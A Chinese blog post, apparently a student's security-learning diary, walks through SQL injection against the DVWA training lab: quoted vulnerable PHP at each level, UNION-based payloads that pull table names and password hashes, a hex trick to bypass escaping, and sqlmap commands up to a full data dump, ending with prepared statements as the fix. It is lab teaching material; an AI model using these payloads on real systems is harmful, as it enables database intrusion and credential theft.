信安学习day3:SQL注入

最新推荐文章于 2024-08-13 11:24:10 发布
最新推荐文章于 2024-08-13 11:24:10 发布
阅读量92 收藏
点赞数
文章标签: 学习 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73760178/article/details/132086182
版权

SQL注入的介绍:

什么是SQL注入:

          在输入字符串中注入SQL指令,在设计不良的程序中忽略了字符检查,则这些注入进去的恶意指令就会被数据库服务器误认为是正常SQL指令而运行。

           这里跟昨天的命令执行漏洞有点像,都是利用开发程序人未对输入语句进行检查和判断,只不过SQL注入会更针对于数据库服务器。

SQL是什么?:

                          用于操控数据库的语言

Select ticket from moive where movie_name= ’tom’——正常SQL语句

Select ticket from moive where movie_name= ’tom’ order by 1#’——使用SQL注入,改变了原语句的意思

SQL注入的使用

先从安全性为low开始研究:

 关键在于:$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";——输入语句
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            mysqli_close($GLOBALS["___mysqli_ston"]);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
            #$sqlite_db_connection->enableExceptions(true);

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    } 
}

?>

输入:SELECT first_name, last_name FROM users WHERE user_id = '1’ and 1 = 1 #’ ;

执行时,SQL语句发生变化,在进行原有查询’1’完成后,判断1=1(对的),判断正确则才会有输出(#作用是注释后续的SQL语句)

输入:SELECT first_name, last_name FROM users WHERE user_id = '1’ and 1 = 2 #’ ;

这个判断语句是错误的,因此就不会出现结果,注意这里的错误是语法错误,因此不会直接报错,而是不返回结果,这证明此时网页中就出现了SQL漏洞

 通过两次尝试(正常输出,错误输出)可以证明SQL语句生效,存在SQL注入漏洞。

 utility:

1.判断列的字段数:order by column_num

SELECT first_name, last_name FROM users WHERE user_id = '1’ order by 1 #’ ;

SELECT first_name, last_name FROM users WHERE user_id = '1’ order by 2 #’ ;

SELECT first_name, last_name FROM users WHERE user_id = '1’ order by 3 #’ ;

这时order by 3报错,证明此数据库里只有2列的字段数

 

 

2.联合查询其他信息union select sql1 sql2

SELECT first_name, last_name FROM users WHERE user_id = '1’ union select user(),database()#’ ;

用户输入了SQL语句,执行了Mysql内置函数user()(当前数据库用户)和database()(数据库名称)

3.联合查询表:union select table_name from information_schema.tables where table_schema= ’database_name’#’;

SELECT first_name, last_name FROM users WHERE user_id = '1’ union select table_name from information_schema.tables where table_schema= ’dvwa’#’;

查看dvwa里有什么数据库

用户输入SQL语句,从information_schema数据库中查询dvwa数据库表

4.联合查询信息 union query_sql

SELECT first_name, last_name FROM users WHERE user_id = '1’ union select user,password from users #’ ;

 

此密码是Md5加密的,可以进行破解(通过字典,遍历,暴力)

使用sqlmap (更简便,更快)

启动!sqlmap:在有sqlmap的文件里打开终端输入:

python sqlmap.py

第一步:检测漏洞:python sqlmap.py -u "地址" 

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=5lg46prml89lu1cv490jj41i6d; security=low"

——我们使用的DVWA,需要登录,所以我们需要给一个cookie,一个允许访问权限

这里我们可以知道此时sqlmap探测的结果,并反馈回来,得知它是有此漏洞的。 

第二步获取数据库名:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=5lg46prml89lu1cv490jj41i6d; security=low" --dbs

--dbs:database server获取所有数据库名

 

第三步:获取指定数据库表

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=5lg46prml89lu1cv490jj41i6d; security=low" -D dvwa --tables

-D:指定想要获取的数据库名为dvwa;

--tables:列出数据库表

第四步:获取指定数据库列或表项:

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=5lg46prml89lu1cv490jj41i6d; security=low" -D dvwa -T users --columns

-T:table指定想要获取的表名为users

--columns:列出表项/列

 

 第五步:获取数据

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=5lg46prml89lu1cv490jj41i6d; security=low" -D dvwa -T users --dump

--dump:读取数据

 

SQL注入的防御

过滤用户输入内容,不让输入sql语句:将特殊符号判断为空或不执行;

security medium:

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Display values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

 关键句: $id mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);——————mysqli_real_escape_string转义字符串中的字符,将特殊字符转换

解决方法:避免出现’’的出现,将dvwa替换为database()或者0x64767761

SELECT first_name, last_name FROM users WHERE user_id = '1’ union select table_name,table_schema from information_schema.tables where table_schema= database()#’;

SELECT first_name, last_name FROM users WHERE user_id = '1’ union select table_name,table_schema from information_schema.tables where table_schema= 0x64767761#’;

security high:

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}

?>

关键句:$query  "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";——添加了限制,缺少对传入数据的过滤

security impossible:

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        $id = intval ($id);
        switch ($_DVWA['SQLI_DB']) {
            case MYSQL:
                // Check the database
                $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
                $data->bindParam( ':id', $id, PDO::PARAM_INT );                
$data->execute();
                $row = $data->fetch();


                // Make sure only 1 result is returned
                if( $data->rowCount() == 1 ) {
                    // Get values
                    $first = $row[ 'first_name' ];
                    $last  = $row[ 'last_name' ];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
                break;
            case SQLITE:
                global $sqlite_db_connection;

                $stmt = $sqlite_db_connection->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;' );
                $stmt->bindValue(':id',$id,SQLITE3_INTEGER);
                $result = $stmt->execute();
                $result->finalize();
                if ($result !== false) {
                    // There is no way to get the number of rows returned
                    // This checks the number of columns (not rows) just
                    // as a precaution, but it won't stop someone dumping
                    // multiple rows and viewing them one at a time.

                    $num_columns = $result->numColumns();
                    if ($num_columns == 2) {
                        $row = $result->fetchArray();

                        // Get values
                        $first = $row[ 'first_name' ];
                        $last  = $row[ 'last_name' ];

                        // Feedback for end user
                        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                    }
                }

                break;
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

关键句: 

// Was a number entered?————这里做了后端格式验证,具体分析
    if(is_numeric$id )) {——判断是否是数字
        $id intval ($id);——再次确认
        switch ($_DVWA['SQLI_DB']) {
            case MYSQL:
                // Check the database————做了SQL预处理,PDO(配合正确的过滤和sql语句能避免sql注入)
                $data $db->prepare'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );——进行SQL预处理
                $data->bindParam':id'$idPDO::PARAM_INT );——绑定输入参数,并再次指定为整形
                $data->execute();
                $row $data->fetch();

这样的防御就可以完全避免sql漏洞的出现了。

yiqiqukanhaiba
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
中科大信安SQL注入报告
07-11
### 中科大信安SQL注入报告 #### 一、背景介绍 本次实验是中科大信息安全导论课程的一部分,旨在通过实践让同学们理解SQL注入的基本原理及其防范措施。实验分为六个安全级别,每个级别的难度逐渐增加,通过对不同...
信安必备靶场-sqli-labs-master-用于练习sql注入各种注入类型
08-12
这个靶场通常用于安全培训、渗透测试和学习Web应用程序安全方面的人员,它提供了一系列的模拟环境和挑战,目的是让用户通过实际操作来理解和掌握SQL注入漏洞的利用技术。 在这个靶场上,用户可以创建账号并登录,...
信安学习day12:SQL注入的介绍
weixin_73760178的博客
08-15 60
group_concat(table_name)是将所有表的名连接到一起,因为考虑到wed网页里对输出会有限制。要在SQL查询中的id设为-1,因为这样可以不让原本的sql语句输出,而是让union后的语句输出。web应用程序对用户输入的数据没有进行过滤,或者过滤不严,就把SQL语句带进数据库进行查询。二、判断SQL注入是字符型还是数字型。
信安学习day15:SQL注入——布尔盲注,延时注入及堆叠注入
weixin_73760178的博客
08-17 86
盲注:不会给回显,只能感觉到页面有一定的变化。会出现一定的差异(页面的运行时间和页面大小)堆叠注入:拥有很高的权限可以对数据库进行更改。sql语句特性:通过分号隔开能分开出很多语句。
信安学习day13:SQL注入报错注入和宽字节注入
weixin_73760178的博客
08-16 85
Payload:and extractvalue(1,concat(0x7e,(select user()),0x7e)) #——道理一样。2.extract value():对XML文档进行查询的函数,当参数的格式不正确而产生的错误,会返回参数的信息;此时这个%B7和/被网页识别为汉字,此时的’就空闲出来且为有效的’,我们就可以进行SQL语句的闭合,注入。gbk编码针对于汉字,汉字url编码2位,字母url编码1位。3.updatexml():更新XML文档的函数。发的编码为:%B7%B7。
1day宏景HCM attestation SQL注入
weixin_43167326的博客
05-23 970
宏景HCM系统是一款综合性人力资源管理软件,包括人员、组织、薪资、绩效、招聘等功能,支持自助服务和灵活的报表工具,满足企业的全面人力资源管理需求。
信安学习day14:sqlmap的基础使用
weixin_73760178的博客
08-16 90
是一个开源的渗透工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限,它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。[工具使用]SqlMap_拈花倾城的博客-CSDN博客——全手册标准格式: Python sqlmap.py -X xxx.txt --risk 3 --level 3——万能的命令1.判断是否有SQL注入
0day 红帆ioffice存在SQL注入漏洞
weixin_43167326的博客
04-15 441
红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。
0day 用友YonBIP getStaffInfo存在SQL注入漏洞
weixin_43167326的博客
06-12 1334
YonBIP用友商业创新平台,是用友在数字经济时代面向成长型、大型企业及巨型企业,融合了先进且高可用技术平台和公共与关键商业应用与服务,支撑和运行客户的商业创新(业务创新、管理变革),并且具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征的综合型服务平台。用友YonBIP高级版存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
1day WordPress Dokan Pro插件 SQL注入漏洞复现
weixin_43167326的博客
06-28 952
WordPress Dokan Pro插件是一款功能强大的多供应商电子商务市场解决方案,功能全面、易于使用的多供应商电子商务平台解决方案,适合各种规模的电商项目。允许管理员创建一个多卖家平台,卖家可以注册账户并在平台上创建自己的店铺,展示和销售自己的产品。提供直观的用户界面,卖家能够轻松管理他们的店铺,包括添加产品、处理订单和与客户进行沟通。
信安学习学习方法
12-06
### 信安学习方法知识点详解 #### 一、专业背景与发展趋势 - **信息安全的重要性**:随着信息技术的快速发展,信息安全已成为国家发展战略中的重要组成部分。它不仅关乎国家安全、社会稳定,也直接关系到个人隐私...
信安实验报告3防火墙实验.pdf
11-18
信安实验报告3防火墙实验.pdf
cheatsheet:华顺信安技术羊皮卷
05-25
华顺信安技术羊皮卷信息安全作为一项综合性学科,需要积累大量的基础知识,包括系统知识、网络知识、数据库知识、容器知识、安全知识、正则表达式、shell编程等等。任何一个个体都不是字典,我们能记住一些基础信息...
1day 建文工程管理系统 businessMangere SQL注入漏洞
weixin_43167326的博客
07-22 996
建文工程管理系统是一款综合性的管理系统,它集成了信息技术、管理科学和工程实践,以实现对工程项目的全过程智能化、高效化和精细化管理。
OrangePi AIpro学习5 —— 模型推理程序开发
HuanBianCheng27的博客
08-13 692
本章讲解Resnet50模型如何运行在昇腾芯片上,如何对图片进行推理
车身域测试学习、CANoe工具实操学习、UDS诊断测试、功能安全测试、DTC故障注入测试、DBC数据库、CDD数据库、CAN一致性测试
车载测试
08-12 575
车身域测试学习、CANoe工具实操学习、UDS诊断测试、功能安全测试、DTC故障注入测试、DBC数据库、CDD数据库、CAN一致性测试
学习总结】JVM篇
最新发布
qq_43813182的博客
08-13 367
HotSpot虚拟机时OpenJDK和OracleJDK中默认的Java虚拟机。它最初并非由Sun公司所开发,而是由一家名为“Longview Technologies”的小公司设计。Sun公司注意到这款虚拟机在即时编译等多个方面有着优秀的理念和实际成果,在1997年收购了Longview Technologies公司,从而获得了HotSpot虚拟机让HotSpot虚拟机与总不同的就是它的热点探测技术。HotSpot虚拟机通过执行计数器找出最具有编译价值的代码。然后通知即时编译器以方法为单位进行编译。
信安之路2017:安全学习与经验分享
"SQL注入学习总结"和"SQL注入的常规思路及奇葩技巧"分析了SQL注入的原理和应对方法,"XSS学习笔记"分为两部分,详述了XSS攻击的类型和防御手段。"Session机制及CSRF攻防"则关注了会话管理及跨站请求伪造的防范。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值